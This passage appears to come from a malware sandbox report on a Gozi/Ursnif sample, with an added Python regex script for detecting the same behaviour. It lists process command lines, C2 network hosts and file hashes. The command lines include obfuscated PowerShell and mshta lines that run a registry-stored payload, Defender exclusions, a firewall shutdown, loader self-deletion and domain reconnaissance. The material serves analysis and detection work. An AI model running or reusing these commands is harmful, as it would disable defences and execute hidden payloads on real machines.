"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xvsleyr -value gp; new-alias -name whpcnio -value iex; whpcnio ([System.Text.Encoding]::ASCII.GetString((xvsleyr "HKCU:Software\AppDataLow\Software\Microsoft\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453").CharFolder))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E9C.tmp" "c:\Users\Admin\AppData\Local\Temp\51nl350v\CSCC3572B61CE2C4D9983F3D2D7AFE08A9A.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FC5.tmp" "c:\Users\Admin\AppData\Local\Temp\gwfwitbd\CSC970B265ABB4CA3B74729EAA4FE53D8.TMP"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\34A2.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\34A2.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\58E.bin1 > C:\Users\Admin\AppData\Local\Temp\58E.bin & del C:\Users\Admin\AppData\Local\Temp\58E.bin1"
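Read in order, the command lines above are the whole chain this Gozi sample ran after the AutoIt loader: Defender exclusions and the firewall switched off, a second stage pulled out of HKCU\Software\AppDataLow\Software\Microsoft\{GUID} by mshta and by alias-obfuscated PowerShell, the loader deleted after a ping delay, and the classic Ursnif reconnaissance battery appended to a .bin1 file in %TEMP%. The Python below is an added example, not part of the sandbox report: it turns those behaviours into a small set of regex rules and runs them over a constructed input copied from the report's own process list plus one benign line. The rule names, regexes and phase labels are the example's own, not the sandbox's signature names.

```python
"""Rule-based triage of process command lines, modelled on the Gozi run above.

Added example, not part of the sandbox report. Rule names, patterns and phase
labels are this example's own; the sample input is constructed from the
report's process list plus one benign line.
"""
import re
from collections import defaultdict

# Constructed input: command lines copied from the report above, plus one
# benign line (constructed) to show the rules stay quiet on ordinary activity.
SAMPLE_CMDLINES = [
    r'C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au3',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"',
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference -ExclusionPath C:\\',
    r'"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off',
    r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xnq8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xnq8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453\\\DiagramClass'));if(!window.flag)close()</script>"''',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xvsleyr -value gp; new-alias -name whpcnio -value iex; whpcnio ([System.Text.Encoding]::ASCII.GetString((xvsleyr "HKCU:Software\AppDataLow\Software\Microsoft\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453").CharFolder))',
    r'"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"',
    r'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\34A2.bi1"',
    r'cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\58E.bin1"',
    r'cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"',
    r'cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"',
    r'cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"',
    r'cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"',
    r'cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"',
    r'cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\58E.bin1 > C:\Users\Admin\AppData\Local\Temp\58E.bin & del C:\Users\Admin\AppData\Local\Temp\58E.bin1"',
    r'"C:\Windows\System32\notepad.exe" C:\Users\Admin\Documents\notes.txt',  # benign, constructed
]

# (rule name, phase, regex). Names and phases are this example's, not the sandbox's.
RULES = [
    ("autoit_runs_script", "loader", r'AutoIt3\.exe"?\s+\S+\.au3'),
    ("defender_exclusion", "evasion", r'Add-MpPreference\s+-Exclusion(?:Path|Extension|Process|IpAddress)\b'),
    ("firewall_disabled", "evasion", r'netsh(?:\.exe)?"?\s+advfirewall\s+set\s+allprofiles\s+state\s+off'),
    # Gozi keeps its PowerShell stage in HKCU\Software\AppDataLow\Software\Microsoft\{GUID};
    # the rule tolerates the ':' and the doubled/tripled backslashes seen in both command lines.
    ("appdatalow_registry_store", "fileless_stage", r'HKCU[:\\]+Software\\+AppDataLow\\+Software\\+Microsoft'),
    ("mshta_registry_payload", "fileless_stage", r'mshta\.exe.*regread\('),
    ("powershell_alias_iex", "fileless_stage", r'new-alias\s+-name\s+\S+\s+-value\s+iex\b'),
    ("self_delete_after_ping", "cleanup", r'ping\s+\S+\s+-n\s+\d+\s*&&\s*del\b'),
    ("external_ip_lookup", "recon", r'nslookup\s+myip\.opendns\.com\s+resolver1\.opendns\.com'),
    # Host/domain enumeration redirected into a file under %TEMP%.
    ("recon_to_tempfile", "recon",
     r'\b(?:systeminfo|net\s+view|net\s+config|tasklist|driverquery|nltest|reg\.exe\s+query)\b.*>>?\s*"?\S*\\Temp\\\S+'),
    # The collected .bin1 is renamed to .bin and the working copy deleted.
    ("recon_collection_finalized", "recon", r'\btype\s+\S+\.bin1\s*>\s*\S+\.bin\b.*&\s*del\b'),
]
COMPILED = [(name, phase, re.compile(rx, re.IGNORECASE)) for name, phase, rx in RULES]
PHASE = {name: phase for name, phase, _ in RULES}


def triage(cmdlines):
    """Return {rule_name: [matching command lines]} for every rule that fired."""
    hits = defaultdict(list)
    for line in cmdlines:
        for name, _phase, rx in COMPILED:
            if rx.search(line):
                hits[name].append(line)
    return dict(hits)


def phases(hits):
    """Set of phases covered by the rules that fired."""
    return {PHASE[name] for name in hits}


def gozi_like(hits):
    """Verdict heuristic: evasion + registry-resident stage + recon battery all present."""
    return {"evasion", "fileless_stage", "recon"} <= phases(hits)


if __name__ == "__main__":
    found = triage(SAMPLE_CMDLINES)
    for name in sorted(found, key=lambda n: (PHASE[n], n)):
        print(f"[{PHASE[name]}] {name}: {len(found[name])} line(s)")
    print("gozi-like chain:", gozi_like(found))
```

On a real host the same rules belong over Sysmon Event ID 1 or Security 4688 CommandLine fields, and the registry key in the mshta and powershell lines (HKCU\Software\AppDataLow\Software\Microsoft\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453, values DiagramClass and CharFolder) is the first place to dump during response, since that is where this sample keeps the stage that the loader file deletion at L757 is meant to make unrecoverable from disk.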

Network

Country  Destination         Domain                  Proto
US       8.8.8.8:53          sincheats.com           udp
US       217.21.76.148:80    sincheats.com           tcp
NL       104.80.225.205:443                          tcp
US       217.21.76.148:80    sincheats.com           tcp
US       217.21.76.148:80    sincheats.com           tcp
US       217.21.76.148:80    sincheats.com           tcp
US       217.21.76.148:80    sincheats.com           tcp
US       217.21.76.148:80    sincheats.com           tcp
NL       84.53.175.107:80                            tcp
NL       84.53.175.107:80                            tcp
US       217.21.76.148:80    sincheats.com           tcp
US       13.107.42.16:80     config.edge.skype.com   tcp
DE       194.76.226.200:80   194.76.226.200          tcp
US       8.8.8.8:53          resolver1.opendns.com   udp
US       208.67.222.222:53   resolver1.opendns.com   udp
US       208.67.222.222:53   resolver1.opendns.com   udp
US       208.67.222.222:53   resolver1.opendns.com   udp
BE       193.56.146.189:80   193.56.146.189          tcp
US       13.107.42.16:80     config.edge.skype.com   tcp
DE       194.76.226.200:80   194.76.226.200          tcp
US       8.8.8.8:53          8.8.8.8.in-addr.arpa    udp
US       8.8.8.8:53          1.0.0.127.in-addr.arpa  udp
US       8.8.8.8:53          giporedtrip.at          udp
US       8.8.8.8:53          habpfans.at             udp
PA       190.219.54.242:80   habpfans.at             tcp

Files

C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

MD5 bb0371ce2ac7e24536ace54e03700a9c
SHA1 6002d876e35075abc3595bc91d41c77d77311e71
SHA256 93248391cfe7319c7cd4b0291ab42b0d1ce6a967f5d89df2ac72555c026cb0b5
SHA512 d154ad51cbf62d77d2dc43224ec609abaa0f8db1cead0cca55f6bc06f93ed8abb33999b405c1052c4c813ef5fd5ceb0973c3eabb369cac16dd7b333db0b71842

C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

MD5 bb0371ce2ac7e24536ace54e03700a9c
SHA1 6002d876e35075abc3595bc91d41c77d77311e71
SHA256 93248391cfe7319c7cd4b0291ab42b0d1ce6a967f5d89df2ac72555c026cb0b5
SHA512 d154ad51cbf62d77d2dc43224ec609abaa0f8db1cead0cca55f6bc06f93ed8abb33999b405c1052c4c813ef5fd5ceb0973c3eabb369cac16dd7b333db0b71842

C:\Users\Admin\AppData\Roaming\EdgeData\A.dll

MD5 2557201a634b8e98c1ed3bfd39015a3a
SHA1 94496b50fc6507494381e5e5597dab49dd5121ab
SHA256 bca824981cc23516a047cebefab5c0f42df8d0f79b27000f53bfc16cd1149a32
SHA512 dd8bbf6a41003bda6c53ffa1053907f7d0e21e060c2f3c2d1af18dae4a65ed1e14d53810eea0661220efbf60359bebded3f6eed39890ea1b4cd2eb22026a5d93

C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest

MD5 0d820062cd4e9281229fc36bd2495bf0
SHA1 5375c3d8f680f956d487de87c187e7581cc7f677
SHA256 294585edf06fea398c1507bf6a002360e37c5b6516e1c1fb4fb2f4842c1adf9b
SHA512 0247de017b429d74e721075808eb15839514f62eb3d01668697c5aad909ecb371a73530fb70cc41b803bfe96defc48f05c95dd78d983a5df70c246426d85529d

C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

C:\Users\Admin\AppData\Local\Temp\WD.au3

MD5 a7dedbe8c2e9f408d53df42412fae7df
SHA1 b9b6d45367cf6fc08c023f10ad78a5ca4112d518
SHA256 6681330ccd6ece3b0f34d22cfc37421889db8556c4ddff56ceb3da4db9901d41
SHA512 abe5bb993d433d434646c85984fe8f92ff40bfec41431901ee0cb54026b401005c62361d906e7af3204fd7fb81d26a52b5720265b1be4666b874628e92d79596

C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/4728-141-0x00000000730F0000-0x00000000738A0000-memory.dmp

memory/4728-142-0x0000000002290000-0x0000000002291000-memory.dmp

memory/4728-143-0x00000000022C0000-0x00000000022F6000-memory.dmp

memory/4728-144-0x0000000004CC0000-0x00000000052E8000-memory.dmp

memory/4728-145-0x0000000002292000-0x0000000002293000-memory.dmp

memory/4728-146-0x0000000005320000-0x0000000005342000-memory.dmp

memory/4728-147-0x00000000054C0000-0x0000000005526000-memory.dmp

memory/4728-148-0x00000000055A0000-0x0000000005606000-memory.dmp

C:\Users\Admin\AppData\Roaming\EdgeData\run.au3

MD5 377cac15c169282c8bb7eeccca102767
SHA1 147684c819d3df332cac15fa4df4ad0a286b7b8a
SHA256 908f8c8f384cb59942cd2fe544c50c5488b5bf275cb7ddacb5c02756a3be8dc5
SHA512 317cf4628ff282f38dc1c79e6049e2eb9ae73bc470bc10c896502a5567845dcb1363f2ded15016d567a99941060454b43742010e69d03e95cd4329cb6ca759c8

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/620-151-0x0000000000BE0000-0x0000000000BED000-memory.dmp

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/620-154-0x0000000000BE0000-0x0000000000BED000-memory.dmp

memory/4728-155-0x0000000005BB0000-0x0000000005BCE000-memory.dmp

memory/4728-156-0x0000000002295000-0x0000000002297000-memory.dmp

memory/4728-157-0x0000000006170000-0x00000000061A2000-memory.dmp

memory/4728-158-0x000000006F980000-0x000000006F9CC000-memory.dmp

memory/4728-159-0x0000000006140000-0x000000000615E000-memory.dmp

memory/4728-160-0x00000000074F0000-0x0000000007B6A000-memory.dmp

memory/4728-161-0x0000000006EB0000-0x0000000006ECA000-memory.dmp

memory/4728-162-0x000000007F700000-0x000000007F701000-memory.dmp

memory/4728-163-0x0000000006F20000-0x0000000006F2A000-memory.dmp

memory/4728-164-0x0000000007130000-0x00000000071C6000-memory.dmp

memory/4728-165-0x00000000070E0000-0x00000000070EE000-memory.dmp

memory/4728-166-0x00000000071F0000-0x000000000720A000-memory.dmp

memory/4728-167-0x00000000071D0000-0x00000000071D8000-memory.dmp

memory/1328-168-0x00000000730F0000-0x00000000738A0000-memory.dmp

memory/1328-169-0x0000000002F10000-0x0000000002F11000-memory.dmp

memory/1328-170-0x0000000002F12000-0x0000000002F13000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cf49541f85a11a6dae4e6633f2af97f5
SHA1 190e951e1e830d26db6164774ef4a2b895ea53c0
SHA256 7007b9b332b458192338a82881c4cb3e923dcb16c971e7ab53148fbc402f8e61
SHA512 87b0ebb799854ed78d61a83af2933b7d78967dc8fb6e9f19e86448337815cf8227801e71fd958d5f6d79800dcab602a9d78ab53c2298ae155410e83f4b02935c

memory/1328-172-0x000000006F980000-0x000000006F9CC000-memory.dmp

memory/1328-173-0x0000000002F15000-0x0000000002F17000-memory.dmp

memory/1328-174-0x000000007FC40000-0x000000007FC41000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a371f763359e1f378dd59d4d73fc22ba
SHA1 eaa73c31c9ec87fa0b905a7adf31ef7ca96827de
SHA256 c2e23afd164872ebf5161f81aaaf498158500df3e005ebe8debbd864b75c2382
SHA512 a23bf93828de09ca2d7cd4605b352b8442498ecca1b8de7e551d4bd57e6f5c26ef5062ddc5ff38771a00d032b21307f7c0a3514c0fec6640280b0e45eb71f499

memory/4328-176-0x00000000730F0000-0x00000000738A0000-memory.dmp

memory/4328-177-0x0000000002A90000-0x0000000002A91000-memory.dmp

memory/4328-178-0x0000000002A92000-0x0000000002A93000-memory.dmp

memory/4328-179-0x000000006F980000-0x000000006F9CC000-memory.dmp

memory/4328-180-0x0000000002A95000-0x0000000002A97000-memory.dmp

memory/4328-181-0x000000007F2A0000-0x000000007F2A1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbc28b68bc254b88c6311d1a9b608c59
SHA1 90630652a711d5bab18bb02d5378ea04d49b6fb2
SHA256 750f2bdbd645d5145d1988eab7ef9ac7da7b815b37e4d5ffe4e10a561ec35d74
SHA512 1252b0707d8adaa0f803b65e5364e2c74be2d6bbe58303ce15a07eddaa9392425dcaba8e45e13ea593aba73e2a1f53d00ba6001be37d847aaa3af6a66a857cf8

memory/4800-183-0x00000000730F0000-0x00000000738A0000-memory.dmp

memory/4800-184-0x0000000004E00000-0x0000000004E01000-memory.dmp

memory/4800-185-0x0000000004E02000-0x0000000004E03000-memory.dmp

memory/4616-187-0x0000019B0AE40000-0x0000019B0AE62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 237850810567818bfdee54350f48141e
SHA1 ac6a7601a9eefabd346406d317dba9bea2a7aa06
SHA256 b3158ef56b5e405e5bcd4ac4f1d2267898e36ed847b920657d06364d48438dde
SHA512 c4522e8cf92b7aaff1bd86ed95d285d114cdd4206c6a75b274a63e284f96191178f78514653b1f8d8fbe6533c7e8e44310525e980125a2f0e3fbc5f5ff5f998e

memory/4616-189-0x00007FF836710000-0x00007FF8371D1000-memory.dmp

memory/4616-190-0x0000019B23350000-0x0000019B23352000-memory.dmp

memory/4616-191-0x0000019B23353000-0x0000019B23355000-memory.dmp

memory/4616-192-0x0000019B23356000-0x0000019B23358000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.cmdline

MD5 a547b9b3cc1f4df2859b7a9bd7931a3f
SHA1 765ce8dab4c1d51b5ca67751a573684dbe584b06
SHA256 f8b02bf1ddca39c1756e877571c3e2ec5858b1da2cd8db8613496d73311b09f6
SHA512 09d91adc8acb556e70a7abaeaa2b0c2628e6735c49879b7e9dd12dd97c3c2b6518229c01b9f4ef6d41d693c82f8cf40ca003366f3de957215f8f2fd68b10c745

\??\c:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.0.cs

MD5 0b7537cf8128ca1320d7bf219bb65b46
SHA1 33ca68f06067df84baa078137f1285102d30cb3a
SHA256 42fffdc792c601ba88907615926489b19aec09d687260f8d9a7955650a7756a8
SHA512 3cdc646a28f237b5607aedd68eb11d3f819b3e71773b7bc6294c7e8c985a821049f0a29be9a5eaf6d688df068eea38a749a87b461454ed311e636008c670b276

\??\c:\Users\Admin\AppData\Local\Temp\51nl350v\CSCC3572B61CE2C4D9983F3D2D7AFE08A9A.TMP

MD5 11fe82b214cc2286a43d10efd56e1152
SHA1 f60a607b4b28be7c2d8d17e5c6f91b1a155f0f96
SHA256 2c692831adb728646664bfe08a7f878b1fe7ff05e94cc4b3f77c90d1ea4dd532
SHA512 6f435fc2627a40934bc6bc70df79a4dede52d187badbce0821a70789c1bf19a5c6fa77017266a45cdd48bb4dab35be1e40097819b791a7cc548fa31cdf7dd977

C:\Users\Admin\AppData\Local\Temp\RES1E9C.tmp

MD5 67213eb2dd60ef8b67fc8b70a01cfb25
SHA1 0095dbc594e164188eaaa4a307bbe6488ad10744
SHA256 75d3b38869f3eaa6238dcf6e35591c85e903890b5707b0826ffe0f296ebd0854
SHA512 b7a7aa77a03c7112e2ea9d27d6218662c0903884a0075ad29c1b2e5258d063c7435da1b02c187a08ee1daabb1901da46fcce29fed2eea9221353a211fedd17f7

C:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.dll

MD5 66eb8a277649a024943f56832a90e181
SHA1 d8e85394c1782bffe9cc06b2a9b1497308cfa7dc
SHA256 83cbedef1cacc6c3b87530242e635dc0adf9b3bd07b542c441cf42136401414f
SHA512 8f53510c9bd3e3ab8ce7e1ec5bf68e27c54cbef08ed10ef7a76f1164b05a81982a63a234403e20ba98d3099424f0816135cb84ccdac4e663048147d6c9d4c6cd

\??\c:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.cmdline

MD5 8b53a3921ddf8071130e25193508854a
SHA1 2d1d6cbbc991e87bcedad744f6a6b1ed45081588
SHA256 76280f88d11ea214a977fbc58c8b7de851c68bce0ee46d374c49692993ac160e
SHA512 650ddb7c90c832f132073a9a554a85f23fb5873cd787399328a726b6252136310394f67a63efbade3edc4b257f1b144587b9038f544883967e2673f56817e6df

\??\c:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.0.cs

MD5 35b3f48ba529849ae98e5f2c89b802f6
SHA1 e6ac7f0dff73e320ab7c09f5abb45dede87cfe81
SHA256 f8708957c3c4032d98bcdb50008ff132f1cef7b839521dc4ab9c22ba91a3bb61
SHA512 b6559f6f80520c9a29b1534022483cf2fcae200cac9c4c640cc2db9a7a1588122480f84561f858789067916e455aea57e45b346edb93dcd4a966b2ee4be7e153

\??\c:\Users\Admin\AppData\Local\Temp\gwfwitbd\CSC970B265ABB4CA3B74729EAA4FE53D8.TMP

MD5 8e496206090242e39f6271276296462b
SHA1 07f828f2508306960880a50f1ed92cf329145216
SHA256 bafb4cc80f81fbe6e279eb6fe459a593e1db25a1dfe00e6957900eaa3fd1f3e8
SHA512 96d99695374bc8fe0facfcde5e04b3a4207f785324d44e992b42df009d5e0cef308c6e61fc07af340c3f044d315cb51d3df9c3c2962a1d7d8e5c5ba54a736d4c

C:\Users\Admin\AppData\Local\Temp\RES1FC5.tmp

MD5 f39a7ba4865db23805f3ab18e4a8b044
SHA1 223f41b79dc26bedc3aa4178cf6c0e1ccefe63a5
SHA256 034831ee6eca869f112c97711e0f11db36569623040c9fa33f93bb6fd0a7a778
SHA512 2a787b7df3a7b3442c10f5f164fecaa2d51a475d79b423b63cace78924f35b07ad46426ad5bf8748548448b6200148522ef2848a5dcfb9af7318b9dbef102082

C:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.dll

MD5 f53b6c79d1eb91d140ad67c4a638427e
SHA1 6358f57c5c334fb862252ac68ace0bdd0913ee73
SHA256 c3c0954a791a8d36e3d20685876b03a3afcf540ad91ca510ddb876b1af9bdb5e
SHA512 c9688e618c361156965ecd14131b263c292f3c91af4603d604096129250fecc71a8c80f5300b2b280960361c1890da599630c573543a773c199668667a5bd16c

memory/4616-203-0x0000019B235D0000-0x0000019B23614000-memory.dmp

memory/1048-204-0x0000000002C10000-0x0000000002C11000-memory.dmp

memory/1048-205-0x00000000085A0000-0x0000000008625000-memory.dmp

memory/5004-206-0x0000025D7B650000-0x0000025D7B651000-memory.dmp

memory/5004-207-0x0000025D7B890000-0x0000025D7B915000-memory.dmp

memory/3440-208-0x0000028157CE0000-0x0000028157CE1000-memory.dmp

memory/3440-209-0x0000028157C50000-0x0000028157CD5000-memory.dmp

memory/3740-210-0x00000226779F0000-0x00000226779F1000-memory.dmp

memory/3740-211-0x0000022678C70000-0x0000022678CF5000-memory.dmp

memory/2144-212-0x000001C3239F0000-0x000001C3239F1000-memory.dmp

memory/3428-214-0x0000024B82780000-0x0000024B82781000-memory.dmp

memory/2144-213-0x000001C323B10000-0x000001C323B95000-memory.dmp

memory/3428-215-0x0000024B83090000-0x0000024B83115000-memory.dmp

memory/392-217-0x000001399C2B0000-0x000001399C335000-memory.dmp

memory/392-216-0x000001399A600000-0x000001399A601000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\34A2.bi1

MD5 82f12896705faeb1630b62f16d5f5cc8
SHA1 9ed376a84dd777c28d4510cd747da4fbbc2ff63b
SHA256 caccfc569992c55c1e532dd816a6e1846281397127c61e3403294d527780a35e
SHA512 e1f04928aea8e710cd34fd6a0580ad9fe2f045485574b1ba4e4e7db376cffd9dacbc15e51f54cb247a85985739b0d70b9e783c1e573ceb8785fc0662be35c379

C:\Users\Admin\AppData\Local\Temp\34A2.bi1

MD5 41a49d1a2a3a8713a12ccf89932d4bb7
SHA1 b324e8bbcd4ca71a35d0c00ac63c0255e8ec4287
SHA256 f210a8e30967b13dabe340c45ce4a97e9c94ad74975728eccdd0a27edf29b5fe
SHA512 1fc256f2068eb9ac32c04bad119e94ba006808fd2be48db397eecf69acd6d8972334f81f8439d6e153a9cb99db618a613f3b0adf2b5784c264b61d4d5c0669b1

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

C:\Users\Admin\AppData\Local\Temp\58E.bin1

MD5 2fbcc0fe1378d0ecf1b16a2afd880379
SHA1 6d4b4dba0c4e745dee18ec08f26a438484806919
SHA256 9b2a25150cdfabd658312ca8f336dbae5088de792e5913a7a7285c898278a3b5
